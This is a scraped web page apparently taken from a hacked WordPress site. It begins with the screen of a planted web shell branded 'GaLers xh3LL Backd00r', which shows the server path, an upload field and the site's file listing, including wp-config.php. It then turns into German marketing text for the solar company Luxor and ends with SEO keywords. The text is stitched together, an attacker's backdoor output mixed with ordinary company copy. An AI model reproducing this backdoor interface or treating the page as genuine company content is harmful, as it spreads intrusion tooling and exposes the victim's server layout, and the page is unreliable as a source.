[#] GaLers xh3LL Backd00r [#]

Current Path : /var/www/vhosts/web1292.webbox442.server-home.org/html/
Upload File :

Name
Size
Permissions
Options
dumper
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.238 KB
-rw-r--r--
gd-config-sample.php
0.001 KB
-rw-r--r--
googlebf2756238ee18c09.html
0.052 KB
-rw-r--r--
index.php
0.386 KB
-rw-r--r--
license.txt
19.086 KB
-rw-r--r--
readme.html
8.962 KB
-rw-r--r--
wp-activate.php
4.554 KB
-rw-r--r--
wp-blog-header.php
0.265 KB
-rw-r--r--
wp-comments-post.php
3.439 KB
-rw-r--r--
wp-config-sample.php
2.828 KB
-rw-r--r--
wp-config.php
3.291 KB
-rw-r--r--
wp-cron.php
2.654 KB
-rw-r--r--
wp-lang.php
0.667 KB
-rw-r--r--
wp-links-opml.php
1.95 KB
-rw-r--r--
wp-load.php
40.542 KB
-rw-r--r--
wp-login.php
28.623 KB
-rw-r--r--
wp-mail.php
7.542 KB
-rw-r--r--
wp-settings.php
9.667 KB
-rw-r--r--
wp-signup.php
17.792 KB
-rw-r--r--
wp-trackback.php
3.613 KB
-rw-r--r--
xmlrpc.php
2.655 KB
-rw-r--r--

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat Luxor | Photovoltaik Salzgitter
Go to Top

Luxor

Richtig genutzt, kann die Sonne unseren Energiehunger für viele Jahrtausende unbegrenzt stillen. Frei von schädlichen CO2-Emissionen.

Wir bei Luxor sind fasziniert von der Magie der Sonne. Schon wenige Sonnenstrahlen genügen, um uns Menschen glücklich zu machen. Auch auf andere Weise schenkt uns die Sonne Energie – und das in fast unerschöpflicher Menge. Um ihr Licht in elektrische Energie umzuwandeln, entwickeln wir seit 2004 Markensolarmodule in bester deutscher Ingenieursqualität. Besonders am Herzen liegen uns und Unternehmensgründer Volker Leh dabei Langlebigkeit, Zuverlässigkeit und strenge Standards. Diese gelten auch für unsere lizenzierten Partnerproduktionen in Europa und Asien, die Luxor Module nachhaltig herstellen. Mit großem Erfolg. Überall in den internationalen Solarmärkten sind Eco Line 60 und Eco Line 72 zuverlässig im Einsatz. Auf Privathäusern, Gewerbebauten, Scheunen, Ställen und in Freifeldanlagen. Mit der Erfahrung einer installierten Leistung von ca. 300 MWp und eigenen Niederlassungen in Shanghai und Tokio arbeiten wir an Energiekonzepten für morgen. Denn eines ist sicher: Sonnenschein für die nächsten 5 Milliarden Jahre.

Wir wollen die Zukunft mitgestalten

Photovoltaik ist eine junge und spannende Branche. Sie kann Strom dort erzeugen, wo er benötigt wird. Nämlich verbrauchernah.

Die Sonne scheint fast jeden Tag kostenlos für uns. Jahr für Jahr erreicht circa 10.000 Mal so viel Sonnenenergie die Erde, wie derzeit verbraucht wird. Wer diese Kraft der Sonne nutzt, löst unsere Energieprobleme auf saubere und intelligente Weise. Das tut unserer Umwelt gleich mehrfach gut. Die endlichen Ressourcen der Erde werden nicht länger ausgebeutet. Photovoltaik erzeugt Energie ohne umweltbelastende Auswirkungen. Und sie stellt diese Energie dezentral bereit. Genau dort, wo wir sie brauchen. Das bedeutet: Entscheidungsfreiheit, kurze Transportwege und Unabhängigkeit von Infrastrukturen wie Pipelines. Diese überzeugenden Vorteile sind es, die uns „sunshine people“ von Luxor in gewisser Weise zu Sonnenanbetern machen. Sie motivieren uns Tag für Tag, noch bessere Lösungen für noch mehr Solarenergie zu entwickeln.

Qualität entscheidet bei der Partnerwahl

Unsere Partnerproduktionen wählen wir nach klar definierten Kriterien aus. Motivation ist dabei ebenso wichtig wie Photovoltaik-Know-how.

Entscheidend ist für uns nicht, wo ein Solarmodul hergestellt wird, sondern wer es herstellt: Wir von Luxor. Mit dem besonderen Qualitätsanspruch deutscher Ingenieure fertigen wir derzeit an drei Standorten in Asien und zwei Standorten in Europa. Vor Ort sorgen 25 Luxor Mitarbeiter, darunter fünf Ingenieure, für eine 100%ige Qualitätskontrolle. Unsere lizenzierten Partnerproduktionen wählen wir sorgfältig aus –  modernstes Produktionsequipment und ständige technische Weiterentwicklung sind die Basis für eine langjährige, vertrauensvolle Zusammenarbeit. Mit unserer eigenen Niederlassung in Shanghai haben wir die nötige Nähe zum Geschehen und können Produktionsprozesse noch intensiver prüfen, die Warenendkontrolle zuverlässig gewährleisten und die laufenden Vergleichsmessungen beim TÜV Shanghai überwachen. Die beste Garantie dafür, dass unsere Solarmodule durch gleichbleibend hohe Qualität überzeugen.

Photovoltaik Hannover, Solaranlagen Hannover, Bosch Solar Hannover, Sunpower Hannover